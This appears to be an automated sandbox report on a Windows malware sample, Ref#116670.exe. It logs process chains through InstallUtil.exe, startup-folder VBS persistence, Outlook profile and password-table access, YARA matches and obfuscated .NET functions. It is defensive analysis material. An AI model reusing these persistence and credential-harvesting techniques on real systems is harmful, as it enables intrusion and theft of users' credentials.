                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002E33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002E48000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002E54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002E15000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.000000000299E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.00000000029BF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3289067719.00000000038CD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002980000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Ref#116670.exeReversingLabs: Detection: 18%
                    Source: C:\Users\user\Desktop\Ref#116670.exeFile read: C:\Users\user\Desktop\Ref#116670.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Ref#116670.exe "C:\Users\user\Desktop\Ref#116670.exe"
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\vdvfyt.exe "C:\Users\user\AppData\Roaming\vdvfyt.exe"
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\vdvfyt.exe "C:\Users\user\AppData\Roaming\vdvfyt.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Ref#116670.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Ref#116670.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#116670.exe, 00000000.00000002.2269468767.00000000061F0000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C35000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#116670.exe, 00000000.00000002.2269468767.00000000061F0000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C35000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: 0.2.Ref#116670.exe.388a820.4.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.Ref#116670.exe.388a820.4.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.Ref#116670.exe.388a820.4.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.Ref#116670.exe.388a820.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.Ref#116670.exe.388a820.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.Ref#116670.exe.38da840.0.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.Ref#116670.exe.38da840.0.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.Ref#116670.exe.38da840.0.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.Ref#116670.exe.38da840.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.Ref#116670.exe.38da840.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: Yara matchFile source: 5.2.vdvfyt.exe.3ad97e0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ref#116670.exe.6950000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ref#116670.exe.38097e0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2508374788.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2498291909.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2270876798.0000000006950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2250767887.000000000272F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Ref#116670.exe PID: 6648, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vdvfyt.exe PID: 5704, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_02454755 push edx; retf 0_2_0245475F
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CDE3E5 push eax; ret 0_2_05CDE3E6
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CDE327 push ecx; ret 0_2_05CDE333
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06891208 push eax; iretd 0_2_06891265
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06891207 push eax; iretd 0_2_06891265
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_068DBE69 push esi; retf 0_2_068DBE6C
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_068D0786 pushad ; retf 0_2_068D0787
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_068D0430 push esp; retf 0_2_068D0431
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_068D05D8 push esp; retf 0_2_068D05D9
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_068D3D25 push es; retf 0_2_068D3E74
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_068D1538 pushad ; retf 0_2_068D1539
